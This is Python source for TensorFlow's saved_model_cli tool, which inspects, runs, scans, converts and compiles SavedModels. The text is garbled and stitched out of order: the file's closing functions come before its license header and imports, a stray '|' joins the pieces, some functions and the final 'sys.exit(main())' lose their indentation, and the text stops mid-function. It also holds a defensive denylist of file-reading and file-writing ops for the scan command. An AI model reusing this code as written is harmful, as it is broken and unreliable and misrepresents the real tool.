  # No tag-set given: list the available tag-sets.
  if args.tag_set is None:
    _show_tag_sets(args.dir)
    return
  # Tag-set but no signature key: list the SignatureDef keys.
  if args.signature_def is None:
    _show_signature_def_map_keys(args.dir, args.tag_set)
    return
  # Fully specified: show the inputs/outputs of one SignatureDef.
  _show_inputs_outputs(args.dir, args.tag_set, args.signature_def)
def run(args):
  """Function triggered by run command.

  Args:
    args: A namespace parsed from command line.

  Raises:
    AttributeError: An error when neither --inputs nor --input_exprs is passed
      to run command.
  """
  # At least one source of input data is mandatory.
  if not (args.inputs or args.input_exprs or args.input_examples):
    raise AttributeError(
        'At least one of --inputs, --input_exprs or --input_examples must be '
        'required')

  feed_dict = load_inputs_from_input_arg_string(
      args.inputs, args.input_exprs, args.input_examples)
  run_saved_model_with_feed_dict(args.dir, args.tag_set, args.signature_def,
                                 feed_dict, args.outdir,
                                 args.overwrite, worker=args.worker,
                                 init_tpu=args.init_tpu, tf_debug=args.tf_debug)
def scan(args):
  """Function triggered by scan command.

  Args:
    args: A namespace parsed from command line.
  """
  # Without a tag-set, scan every MetaGraph in the SavedModel.
  if not args.tag_set:
    saved_model = saved_model_utils.read_saved_model(args.dir)
    for meta_graph_def in saved_model.meta_graphs:
      scan_meta_graph_def(meta_graph_def)
    return
  # Otherwise scan only the MetaGraph selected by the tag-set.
  scan_meta_graph_def(
      saved_model_utils.get_meta_graph_def(args.dir, args.tag_set))
def convert_with_tensorrt(args):
  """Function triggered by 'convert tensorrt' command.

  Args:
    args: A namespace parsed from command line.
  """
  # Import here instead of at top, because this will crash if TensorRT is
  # not installed
  from tensorflow.python.compiler.tensorrt import trt_convert as trt  # pylint: disable=g-import-not-at-top

  if args.convert_tf1_model:
    # Legacy TF1 conversion path.
    trt.create_inference_graph(
        None,
        None,
        max_batch_size=1,
        max_workspace_size_bytes=args.max_workspace_size_bytes,
        precision_mode=args.precision_mode,
        minimum_segment_size=args.minimum_segment_size,
        is_dynamic_op=True,
        input_saved_model_dir=args.dir,
        input_saved_model_tags=args.tag_set.split(','),
        output_saved_model_dir=args.output_dir)
    return

  # TF2 conversion path.
  params = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
      max_workspace_size_bytes=args.max_workspace_size_bytes,
      precision_mode=args.precision_mode,
      minimum_segment_size=args.minimum_segment_size)
  converter = trt.TrtGraphConverterV2(
      input_saved_model_dir=args.dir,
      input_saved_model_tags=args.tag_set.split(','),
      conversion_params=params)
  try:
    converter.convert()
  except Exception as e:  # pylint: disable=broad-except
    # A failure here often means the SavedModel is a TF1 model.
    raise RuntimeError(
        '{}. Try passing "--convert_tf1_model=True".'.format(e))
  converter.save(output_saved_model_dir=args.output_dir)
def aot_compile_cpu(args):
  """Function triggered by aot_compile_cpu command.

  Args:
    args: A namespace parsed from command line.
  """
  # Default to the variables shipped inside the SavedModel directory.
  checkpoint_path = (
      args.checkpoint_path
      or os.path.join(args.dir, 'variables/variables'))

  # Translate the --variables_to_feed flag: empty -> freeze all variables,
  # 'all' -> every variable is feedable (None means "identify later"),
  # otherwise a comma-delimited explicit list.
  feed_spec = args.variables_to_feed
  if not feed_spec:
    variables_to_feed = []
  elif feed_spec.lower() == 'all':
    variables_to_feed = None  # We will identify them after.
  else:
    variables_to_feed = feed_spec.split(',')

  saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
      checkpoint_path=checkpoint_path,
      meta_graph_def=saved_model_utils.get_meta_graph_def(
          args.dir, args.tag_set),
      signature_def_key=args.signature_def_key,
      variables_to_feed=variables_to_feed,
      output_prefix=args.output_prefix,
      target_triple=args.target_triple,
      target_cpu=args.target_cpu,
      cpp_class=args.cpp_class,
      multithreading=args.multithreading.lower() not in ('f', 'false', '0'))
def add_show_subparser(subparsers):
  """Registers the `show` sub-command on the given subparsers object."""
  usage_msg = (
      'Usage examples:\n'
      'To show all tag-sets in a SavedModel:\n'
      '$saved_model_cli show --dir /tmp/saved_model\n\n'
      'To show all available SignatureDef keys in a '
      'MetaGraphDef specified by its tag-set:\n'
      '$saved_model_cli show --dir /tmp/saved_model --tag_set serve\n\n'
      'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
      'passed in, separated by \';\':\n'
      '$saved_model_cli show --dir /tmp/saved_model --tag_set serve,gpu\n\n'
      'To show all inputs and outputs TensorInfo for a specific'
      ' SignatureDef specified by the SignatureDef key in a'
      ' MetaGraph.\n'
      '$saved_model_cli show --dir /tmp/saved_model --tag_set serve'
      ' --signature_def serving_default\n\n'
      'To show all available information in the SavedModel:\n'
      '$saved_model_cli show --dir /tmp/saved_model --all')
  show_parser = subparsers.add_parser(
      'show',
      description=usage_msg,
      formatter_class=argparse.RawTextHelpFormatter)
  show_parser.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to inspect')
  show_parser.add_argument(
      '--all',
      action='store_true',
      help='if set, will output all information in given SavedModel')
  show_parser.add_argument(
      '--tag_set',
      type=str,
      default=None,
      help='tag-set of graph in SavedModel to show, separated by \',\'')
  show_parser.add_argument(
      '--signature_def',
      type=str,
      default=None,
      metavar='SIGNATURE_DEF_KEY',
      help='key of SignatureDef to display input(s) and output(s) for')
  # Route parsed `show` invocations to the show() handler.
  show_parser.set_defaults(func=show)
def add_run_subparser(subparsers):
  """Registers the `run` sub-command on the given subparsers object."""
  usage_msg = ('Usage example:\n'
               'To run input tensors from files through a MetaGraphDef and save'
               ' the output tensors to files:\n'
               '$saved_model_cli show --dir /tmp/saved_model --tag_set serve \\\n'
               '   --signature_def serving_default \\\n'
               '   --inputs input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
               '\\\n'
               '   --input_exprs \'input3_key=np.ones(2)\' \\\n'
               '   --input_examples '
               '\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
               '   --outdir=/out\n\n'
               'For more information about input file format, please see:\n'
               'https://www.tensorflow.org/guide/saved_model_cli\n')
  run_parser = subparsers.add_parser(
      'run', description=usage_msg, formatter_class=argparse.RawTextHelpFormatter)
  run_parser.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to execute')
  run_parser.add_argument(
      '--tag_set',
      type=str,
      required=True,
      help='tag-set of graph in SavedModel to load, separated by \',\'')
  run_parser.add_argument(
      '--signature_def',
      type=str,
      required=True,
      metavar='SIGNATURE_DEF_KEY',
      help='key of SignatureDef to run')
  # Three alternative ways of supplying input data, in increasing precedence.
  help_text = ('Loading inputs from files, in the format of \'<input_key>=<filename>,'
               ' or \'<input_key>=<filename>[<variable_name>]\', separated by \';\'.'
               ' The file format can only be from .npy, .npz or pickle.')
  run_parser.add_argument('--inputs', type=str, default='', help=help_text)
  help_text = ('Specifying inputs by python expressions, in the format of'
               ' "<input_key>=\'<python expression>\'", separated by \';\'. '
               'numpy module is available as \'np\'. '
               'Will override duplicate input keys from --inputs option.')
  run_parser.add_argument('--input_exprs', type=str, default='', help=help_text)
  help_text = (
      'Specifying tf.Example inputs as list of dictionaries. For example: '
      '<input_key>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
      'separate input keys. Will override duplicate input keys from --inputs '
      'and --input_exprs option.')
  run_parser.add_argument('--input_examples', type=str, default='', help=help_text)
  run_parser.add_argument(
      '--outdir',
      type=str,
      default=None,
      help='if specified, output tensor(s) will be saved to given directory')
  run_parser.add_argument(
      '--overwrite',
      action='store_true',
      help='if set, output file will be overwritten if it already exists.')
  run_parser.add_argument(
      '--tf_debug',
      action='store_true',
      help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
      'intermediate Tensors and runtime GraphDefs while running the '
      'SavedModel.')
  run_parser.add_argument(
      '--worker',
      type=str,
      default=None,
      help='if specified, a Session will be run on the worker. '
      'Valid worker specification is a bns or gRPC path.')
  run_parser.add_argument(
      '--init_tpu',
      action='store_true',
      default=None,
      help='if specified, tpu.initialize_system will be called on the Session. '
      'This option should be only used if the worker is a TPU job.')
  # Route parsed `run` invocations to the run() handler.
  run_parser.set_defaults(func=run)
def add_scan_subparser(subparsers):
  """Registers the `scan` sub-command on the given subparsers object."""
  usage_msg = ('Usage example:\n'
               'To scan for denylisted ops in SavedModel:\n'
               '$saved_model_cli scan --dir /tmp/saved_model\n'
               'To scan a specific MetaGraph, pass in --tag_set\n')
  scan_parser = subparsers.add_parser(
      'scan',
      description=usage_msg,
      formatter_class=argparse.RawTextHelpFormatter)
  scan_parser.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to execute')
  scan_parser.add_argument(
      '--tag_set',
      type=str,
      help='tag-set of graph in SavedModel to scan, separated by \',\'')
  # Route parsed `scan` invocations to the scan() handler.
  scan_parser.set_defaults(func=scan)
def add_convert_subparser(subparsers):
  """Registers the `convert` sub-command (with its `tensorrt` method)."""
  usage_msg = ('Usage example:\n'
               'To convert the SavedModel to one that have TensorRT ops:\n'
               '$saved_model_cli convert \\\n'
               '   --dir /tmp/saved_model \\\n'
               '   --tag_set serve \\\n'
               '   --output_dir /tmp/saved_model_trt \\\n'
               '   tensorrt \n')
  convert_parser = subparsers.add_parser(
      'convert',
      description=usage_msg,
      formatter_class=argparse.RawTextHelpFormatter)
  convert_parser.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to convert')
  convert_parser.add_argument(
      '--output_dir',
      type=str,
      required=True,
      help='output directory for the converted SavedModel')
  convert_parser.add_argument(
      '--tag_set',
      type=str,
      required=True,
      help='tag-set of graph in SavedModel to convert, separated by \',\'')
  # `convert` itself takes a conversion-method sub-command; only `tensorrt`
  # is currently registered.
  method_subparsers = convert_parser.add_subparsers(
      title='conversion methods',
      description='valid conversion methods',
      help='the conversion to run with the SavedModel')
  tensorrt_parser = method_subparsers.add_parser(
      'tensorrt',
      description='Convert the SavedModel with Tensorflow-TensorRT integration',
      formatter_class=argparse.RawTextHelpFormatter)
  tensorrt_parser.add_argument(
      '--max_workspace_size_bytes',
      type=int,
      default=2 << 20,
      help=('the maximum GPU temporary memory which the TRT engine can use at '
            'execution time'))
  tensorrt_parser.add_argument(
      '--precision_mode',
      type=str,
      default='FP32',
      help='one of FP32, FP16 and INT8')
  tensorrt_parser.add_argument(
      '--minimum_segment_size',
      type=int,
      default=3,
      help=('the minimum number of nodes required for a subgraph to be replaced'
            'in a TensorRT node'))
  tensorrt_parser.add_argument(
      '--convert_tf1_model',
      type=bool,
      default=False,
      help='support TRT conversion for TF1 models')
  # Route parsed `convert tensorrt` invocations to the handler.
  tensorrt_parser.set_defaults(func=convert_with_tensorrt)
def add_aot_compile_cpu_subparser(subparsers):
  """Registers the `aot_compile_cpu` sub-command on the subparsers object."""
  usage_msg = '\n'.join(
      ['Usage example:',
       'To compile a SavedModel signature via (CPU) XLA AOT:',
       '$saved_model_cli aot_compile_cpu \\',
       '   --dir /tmp/saved_model \\',
       '   --tag_set serve \\',
       '   --output_dir /tmp/saved_model_xla_aot',
       '', '',
       'Note: Additional XLA compilation options are available by setting the ',
       'XLA_FLAGS environment variable.  See the XLA debug options flags for ',
       'all the options: ',
       '  {}'.format(_XLA_DEBUG_OPTIONS_URL),
       '',
       'For example, to disable XLA fast math when compiling:',
       '',
       'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
       'aot_compile_cpu ...',
       '',
       'Some possibly useful flags:',
       '  --xla_cpu_enable_fast_math=false',
       '  --xla_force_host_platform_device_count=<num threads>',
       '    (useful in conjunction with disabling multi threading)'
      ])
  compile_parser = subparsers.add_parser(
      'aot_compile_cpu',
      description=usage_msg,
      formatter_class=argparse.RawTextHelpFormatter)
  compile_parser.add_argument(
      '--dir',
      type=str,
      required=True,
      help='directory containing the SavedModel to convert')
  compile_parser.add_argument(
      '--output_prefix',
      type=str,
      required=True,
      help=('output directory + filename prefix for the resulting header(s) '
            'and object file(s)'))
  compile_parser.add_argument(
      '--tag_set',
      type=str,
      required=True,
      help='tag-set of graph in SavedModel to convert, separated by \',\'')
  compile_parser.add_argument(
      '--signature_def_key',
      type=str,
      default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
      help=('signature_def key to use.  '
            'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
  compile_parser.add_argument(
      '--target_triple',
      type=str,
      default='x86_64-pc-linux',
      help=('Target triple for LLVM during AOT compilation.  Examples: '
            'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
            'armv7-none-android.  More examples are available in tfcompile.bzl '
            'in the tensorflow codebase.'))
  compile_parser.add_argument(
      '--target_cpu',
      type=str,
      default='',
      help=('Target cpu name for LLVM during AOT compilation.  Examples: '
            'x86_64, skylake, haswell, westmere, <empty> (unknown).  For '
            'a complete list of options, run (for x86 targets): '
            '`llc -march=x86 -mcpu=help`'))
  compile_parser.add_argument(
      '--checkpoint_path',
      type=str,
      default=None,
      help='Custom checkpoint to use (default: use the SavedModel variables)')
  compile_parser.add_argument(
      '--cpp_class',
      type=str,
      required=True,
      help=('The name of the generated C++ class, wrapping the generated '
            'function.  The syntax of this flag is '
            '[[<optional_namespace>::],...]<class_name>.  This mirrors the '
            'C++ syntax for referring to a class, where multiple namespaces '
            'may precede the class name, separated by double-colons.  '
            'The class will be generated in the given namespace(s), or if no '
            'namespaces are given, within the global namespace.'))
  compile_parser.add_argument(
      '--variables_to_feed',
      type=str,
      default='',
      help=('The names of variables that will be fed into the network.  '
            'Options are: empty (default; all variables are frozen, none may '
            'be fed), \'all\' (all variables may be fed), or a '
            'comma-delimited list of names of variables that may be fed.  In '
            'the last case, the non-fed variables will be frozen in the graph.'
            '**NOTE** Any variables passed to `variables_to_feed` *must be set '
            'by the user*.  These variables will NOT be frozen and their '
            'values will be uninitialized in the compiled object '
            '(this applies to all input arguments from the signature as '
            'well).'))
  compile_parser.add_argument(
      '--multithreading',
      type=str,
      default='False',
      help=('Enable multithreading in the compiled computation.  '
            'Note that if using this option, the resulting object files '
            'may have external dependencies on multithreading libraries '
            'like nsync.'))
  # Route parsed `aot_compile_cpu` invocations to the handler.
  compile_parser.set_defaults(func=aot_compile_cpu)
def create_parser():
  """Creates a parser that parse the command line arguments.

  Returns:
    A namespace parsed from command line arguments.
  """
  parser = argparse.ArgumentParser(
      description='saved_model_cli: Command-line interface for SavedModel')
  parser.add_argument('-v', '--version', action='version', version='0.1.0')

  subparsers = parser.add_subparsers(
      title='commands', description='valid commands', help='additional help')

  # Register every sub-command: show, run, scan, convert (tensorrt), and
  # aot_compile_cpu.
  for register_subcommand in (add_show_subparser, add_run_subparser,
                              add_scan_subparser, add_convert_subparser,
                              add_aot_compile_cpu_subparser):
    register_subcommand(subparsers)

  return parser
def main():
  """CLI entry point: parse arguments and dispatch to the chosen command."""
  logging.set_verbosity(logging.INFO)
  cli_parser = create_parser()
  parsed = cli_parser.parse_args()
  # `func` is set by the sub-command's set_defaults(); missing means no
  # sub-command was given on the command line.
  if not hasattr(parsed, 'func'):
    cli_parser.error('too few arguments')
  parsed.func(parsed)
if __name__ == '__main__':
sys.exit(main())
| # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Command-line interface to inspect and execute a graph in a SavedModel.
For detailed usages and examples, please refer to:
https://www.tensorflow.org/guide/saved_model#cli_to_inspect_and_execute_savedmodel
"""
import argparse
import ast
import os
import re
import sys
from absl import app # pylint: disable=unused-import
import numpy as np
import six
from tensorflow.core.example import example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import save
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.tools import saved_model_aot_compile
from tensorflow.python.tools import saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
# URL of the upstream XLA debug-options flag definitions; embedded in the
# `aot_compile_cpu` help text so users can look up valid XLA_FLAGS values.
_XLA_DEBUG_OPTIONS_URL = (
    'https://github.com/tensorflow/tensorflow/blob/master/'
    'tensorflow/compiler/xla/debug_options_flags.cc')

# Set of ops to denylist. The `scan` command reports any MetaGraph that
# contains one of these ops.
_OP_DENYLIST = set(['WriteFile', 'ReadFile', 'PrintV2'])
def _show_tag_sets(saved_model_dir):
  """Prints the tag-sets stored in SavedModel directory.

  Prints all the tag-sets for MetaGraphs stored in SavedModel directory.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
  """
  # Fetch first so a read failure surfaces before any output is printed.
  available_tag_sets = sorted(
      saved_model_utils.get_saved_model_tag_sets(saved_model_dir))
  print('The given SavedModel contains the following tag-sets:')
  for tag_set in available_tag_sets:
    print('%r' % ', '.join(sorted(tag_set)))
def _show_signature_def_map_keys(saved_model_dir, tag_set):
  """Prints the keys for each SignatureDef in the SignatureDef map.

  Prints the list of SignatureDef keys from the SignatureDef map specified by
  the given tag-set and SavedModel directory.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
    tag_set: Group of tag(s) of the MetaGraphDef to get SignatureDef map from,
      in string format, separated by ','. For tag-set contains multiple tags,
      all tags must be passed in.
  """
  signature_def_map = get_signature_def_map(saved_model_dir, tag_set)
  print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
        'following keys:')
  # Iterate the map directly; iteration yields its keys.
  for key in sorted(signature_def_map):
    print('SignatureDef key: \"%s\"' % key)
def _get_inputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfo for all inputs of the SignatureDef.
Returns a dictionary that maps each input key to its TensorInfo for the given
signature_def_key in the meta_graph_def
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDef map to
look up SignatureDef key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps input tensor keys to TensorInfos.
Raises:
ValueError if `signature_def_key` is not found in the MetaGraphDef.
"""
if signature_def_key not in meta_graph_def.signature_def:
raise ValueError(
f'Could not find signature "{signature_def_key}". Please choose from: '
f'{", ".join(meta_graph_def.signature_def.keys())}')
return meta_graph_def.signature_def[signature_def_key].inputs
def _get_outputs_tensor_info_from_meta_graph_def(meta_graph_def,
signature_def_key):
"""Gets TensorInfos for all outputs of the SignatureDef.
Returns a dictionary that maps each output key to its TensorInfo for the given
signature_def_key in the meta_graph_def.
Args:
meta_graph_def: MetaGraphDef protocol buffer with the SignatureDefmap to
look up signature_def_key.
signature_def_key: A SignatureDef key string.
Returns:
A dictionary that maps output tensor keys to TensorInfos.
"""
return meta_graph_def.signature_def[signature_def_key].outputs
def _show_inputs_outputs(saved_model_dir, tag_set, signature_def_key, indent=0):
  """Prints input and output TensorInfos.

  Prints the details of input and output TensorInfos for the SignatureDef
  mapped by the given signature_def_key, followed by the signature's method
  name.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
    tag_set: Group of tag(s) of the MetaGraphDef, in string format, separated
      by ','. For tag-set contains multiple tags, all tags must be passed in.
    signature_def_key: A SignatureDef key string.
    indent: How far (in increments of 2 spaces) to indent each line of output.
  """
  meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
                                                        tag_set)
  inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
      meta_graph_def, signature_def_key)
  outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
      meta_graph_def, signature_def_key)

  indent_str = ' ' * indent

  # Local helper so every line printed below shares the same indent prefix.
  def in_print(s):
    print(indent_str + s)

  in_print('The given SavedModel SignatureDef contains the following input(s):')
  for input_key, input_tensor in sorted(inputs_tensor_info.items()):
    in_print(' inputs[\'%s\'] tensor_info:' % input_key)
    # Nested details get one extra indent level.
    _print_tensor_info(input_tensor, indent+1)

  in_print('The given SavedModel SignatureDef contains the following '
           'output(s):')
  for output_key, output_tensor in sorted(outputs_tensor_info.items()):
    in_print(' outputs[\'%s\'] tensor_info:' % output_key)
    _print_tensor_info(output_tensor, indent+1)

  in_print('Method name is: %s' %
           meta_graph_def.signature_def[signature_def_key].method_name)
def _show_defined_functions(saved_model_dir):
  """Prints the callable concrete and polymorphic functions of the Saved Model.

  Only TF2-style SavedModels carry an object graph; if no MetaGraph has one,
  this prints nothing.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
  """
  meta_graphs = saved_model_utils.read_saved_model(saved_model_dir).meta_graphs
  has_object_graph_def = False

  for meta_graph_def in meta_graphs:
    has_object_graph_def |= meta_graph_def.HasField('object_graph_def')
  if not has_object_graph_def:
    return
  # Load in a throwaway graph so the restore does not pollute the default one.
  with ops_lib.Graph().as_default():
    trackable_object = load.load(saved_model_dir)

  print('\nDefined Functions:', end='')
  # NOTE(review): relies on the private _AugmentedGraphView API to enumerate
  # functions attached to the restored object.
  functions = (
      save._AugmentedGraphView(trackable_object)  # pylint: disable=protected-access
      .list_functions(trackable_object))
  functions = sorted(functions.items(), key=lambda x: x[0])
  for name, function in functions:
    print('\n Function Name: \'%s\'' % name)
    concrete_functions = []
    if isinstance(function, defun.ConcreteFunction):
      concrete_functions.append(function)
    if isinstance(function, def_function.Function):
      concrete_functions.extend(
          function._list_all_concrete_functions_for_serialization())  # pylint: disable=protected-access
    concrete_functions = sorted(concrete_functions, key=lambda x: x.name)
    for index, concrete_function in enumerate(concrete_functions, 1):
      args, kwargs = None, None
      if concrete_function.structured_input_signature:
        args, kwargs = concrete_function.structured_input_signature
      elif concrete_function._arg_keywords:  # pylint: disable=protected-access
        # For pure ConcreteFunctions we might have nothing better than
        # _arg_keywords.
        args = concrete_function._arg_keywords  # pylint: disable=protected-access
      if args:
        print(' Option #%d' % index)
        print(' Callable with:')
        _print_args(args, indent=4)
      if kwargs:
        _print_args(kwargs, 'Named Argument', indent=4)
def _print_args(arguments, argument_type='Argument', indent=0):
  """Formats and prints the argument of the concrete functions defined in the model.

  Args:
    arguments: Arguments to format print.
    argument_type: Type of arguments.
    indent: How far (in increments of 2 spaces) to indent each line of
      output.
  """
  indent_str = ' ' * indent

  # Wrap plain strings in quotes so they read as Python literals; leave
  # everything else unquoted.
  def _maybe_add_quotes(value):
    is_quotes = '\'' * isinstance(value, str)
    return is_quotes + str(value) + is_quotes

  def in_print(s, end='\n'):
    print(indent_str + s, end=end)

  for index, element in enumerate(arguments, 1):
    if indent == 4:
      # Only the top-level call (indent == 4 from _show_defined_functions)
      # labels each element with its ordinal.
      in_print('%s #%d' % (argument_type, index))
    if isinstance(element, six.string_types):
      in_print(' %s' % element)
    elif isinstance(element, tensor_spec.TensorSpec):
      print((indent + 1) * ' ' + '%s: %s' % (element.name, repr(element)))
    elif (isinstance(element, collections_abc.Iterable) and
          not isinstance(element, dict)):
      in_print(' DType: %s' % type(element).__name__)
      in_print(' Value: [', end='')
      for value in element:
        print('%s' % _maybe_add_quotes(value), end=', ')
      # Two backspaces visually erase the trailing ', ' before the bracket
      # on terminals that honor \b.
      print('\b\b]')
    elif isinstance(element, dict):
      in_print(' DType: %s' % type(element).__name__)
      in_print(' Value: {', end='')
      for (key, value) in element.items():
        print('\'%s\': %s' % (str(key), _maybe_add_quotes(value)), end=', ')
      print('\b\b}')
    else:
      in_print(' DType: %s' % type(element).__name__)
      in_print(' Value: %s' % str(element))
def _print_tensor_info(tensor_info, indent=0):
  """Prints details (dtype, shape, name) of the given tensor_info.

  Args:
    tensor_info: TensorInfo object to be printed.
    indent: How far (in increments of 2 spaces) to indent each line output
  """
  indent_str = ' ' * indent

  def in_print(s):
    print(indent_str + s)

  # Invert the {name: enum value} DataType map so the numeric dtype stored in
  # the TensorInfo can be printed as its symbolic name.
  in_print(' dtype: ' +
           {value: key
            for (key, value) in types_pb2.DataType.items()}[tensor_info.dtype])
  # Display shape as tuple.
  if tensor_info.tensor_shape.unknown_rank:
    shape = 'unknown_rank'
  else:
    dims = [str(dim.size) for dim in tensor_info.tensor_shape.dim]
    shape = ', '.join(dims)
    shape = '(' + shape + ')'
  in_print(' shape: ' + shape)
  in_print(' name: ' + tensor_info.name)
def _show_all(saved_model_dir):
  """Prints tag-set, SignatureDef and Inputs/Outputs information in SavedModel.

  Walks every tag-set in the SavedModel, dumps each MetaGraphDef's
  SignatureDef keys with their input/output TensorInfos, and finally lists
  the functions defined in the model.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect.
  """
  all_tag_sets = saved_model_utils.get_saved_model_tag_sets(saved_model_dir)
  for tags in sorted(all_tag_sets):
    print("\nMetaGraphDef with tag-set: '%s' "
          "contains the following SignatureDefs:" % ', '.join(tags))
    joined_tags = ','.join(tags)
    sig_map = get_signature_def_map(saved_model_dir, joined_tags)
    for sig_key in sorted(sig_map):
      print('\nsignature_def[\'' + sig_key + '\']:')
      _show_inputs_outputs(saved_model_dir, joined_tags, sig_key,
                           indent=1)
  _show_defined_functions(saved_model_dir)
def get_meta_graph_def(saved_model_dir, tag_set):
  """DEPRECATED: Use saved_model_utils.get_meta_graph_def instead.

  Gets MetaGraphDef from SavedModel. Returns the MetaGraphDef for the given
  tag-set and SavedModel directory.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect or execute.
    tag_set: Group of tag(s) of the MetaGraphDef to load, in string format,
      separated by ','. For tag-set contains multiple tags, all tags must be
      passed in.

  Raises:
    RuntimeError: An error when the given tag-set does not exist in the
      SavedModel.

  Returns:
    A MetaGraphDef corresponding to the tag-set.
  """
  # Thin delegate kept only for backward compatibility with external callers.
  return saved_model_utils.get_meta_graph_def(saved_model_dir, tag_set)
def get_signature_def_map(saved_model_dir, tag_set):
  """Gets SignatureDef map from a MetaGraphDef in a SavedModel.

  Returns the SignatureDef map for the given tag-set in the SavedModel
  directory.

  Args:
    saved_model_dir: Directory containing the SavedModel to inspect or execute.
    tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
      string format, separated by ','. For tag-set contains multiple tags, all
      tags must be passed in.

  Returns:
    A SignatureDef map that maps from string keys to SignatureDefs.
  """
  return saved_model_utils.get_meta_graph_def(saved_model_dir,
                                              tag_set).signature_def
def scan_meta_graph_def(meta_graph_def):
  """Scans meta_graph_def and reports if there are ops on the denylist.

  Prints the denylisted ops found in the MetaGraph, or a success message when
  none are present.

  Args:
    meta_graph_def: MetaGraphDef protocol buffer.
  """
  ops_in_graph = set(
      meta_graph_lib.ops_used_by_graph_def(meta_graph_def.graph_def))
  flagged = _OP_DENYLIST.intersection(ops_in_graph)
  if not flagged:
    print('MetaGraph with tag set %s does not contain denylisted ops.' %
          meta_graph_def.meta_info_def.tags)
  else:
    # TODO(yifeif): print more warnings
    print(
        'MetaGraph with tag set %s contains the following denylisted ops:' %
        meta_graph_def.meta_info_def.tags, flagged)
def run_saved_model_with_feed_dict(saved_model_dir, tag_set, signature_def_key,
                                   input_tensor_key_feed_dict, outdir,
                                   overwrite_flag, worker=None, init_tpu=False,
                                   tf_debug=False):
  """Runs SavedModel and fetch all outputs.

  Runs the input dictionary through the MetaGraphDef within a SavedModel
  specified by the given tag_set and SignatureDef. Also save the outputs to
  file if outdir is not None.

  Args:
    saved_model_dir: Directory containing the SavedModel to execute.
    tag_set: Group of tag(s) of the MetaGraphDef with the SignatureDef map, in
      string format, separated by ','. For tag-set contains multiple tags, all
      tags must be passed in.
    signature_def_key: A SignatureDef key string.
    input_tensor_key_feed_dict: A dictionary maps input keys to numpy ndarrays.
    outdir: A directory to save the outputs to. If the directory doesn't
      exist, it will be created.
    overwrite_flag: A boolean flag to allow overwrite output file if file with
      the same name exists.
    worker: If provided, the session will be run on the worker. Valid worker
      specification is a bns or gRPC path.
    init_tpu: If true, the TPU system will be initialized after the session
      is created.
    tf_debug: A boolean flag to use TensorFlow Debugger (TFDBG) to observe the
      intermediate Tensor values and runtime GraphDefs while running the
      SavedModel.

  Raises:
    ValueError: When any of the input tensor keys is not valid.
    RuntimeError: An error when output file already exists and overwrite is
      not enabled.
  """
  # Get a list of output tensor names.
  meta_graph_def = saved_model_utils.get_meta_graph_def(saved_model_dir,
                                                        tag_set)

  # Re-create feed_dict based on input tensor name instead of key as
  # session.run uses tensor name.
  inputs_tensor_info = _get_inputs_tensor_info_from_meta_graph_def(
      meta_graph_def, signature_def_key)

  # Check if input tensor keys are valid.
  for input_key_name in input_tensor_key_feed_dict.keys():
    if input_key_name not in inputs_tensor_info:
      raise ValueError(
          '"%s" is not a valid input key. Please choose from %s, or use '
          '--show option.' %
          (input_key_name, '"' + '", "'.join(inputs_tensor_info.keys()) + '"'))

  # Map user-supplied keys to the graph tensor names expected by session.run.
  inputs_feed_dict = {
      inputs_tensor_info[key].name: tensor
      for key, tensor in input_tensor_key_feed_dict.items()
  }
  # Get outputs
  outputs_tensor_info = _get_outputs_tensor_info_from_meta_graph_def(
      meta_graph_def, signature_def_key)
  # Sort to preserve order because we need to go from value to key later.
  output_tensor_keys_sorted = sorted(outputs_tensor_info.keys())
  output_tensor_names_sorted = [
      outputs_tensor_info[tensor_key].name
      for tensor_key in output_tensor_keys_sorted
  ]

  with session.Session(worker, graph=ops_lib.Graph()) as sess:
    if init_tpu:
      print('Initializing TPU System ...')
      # This is needed for freshly started worker, or if the job
      # restarts after a preemption.
      sess.run(tpu.initialize_system())

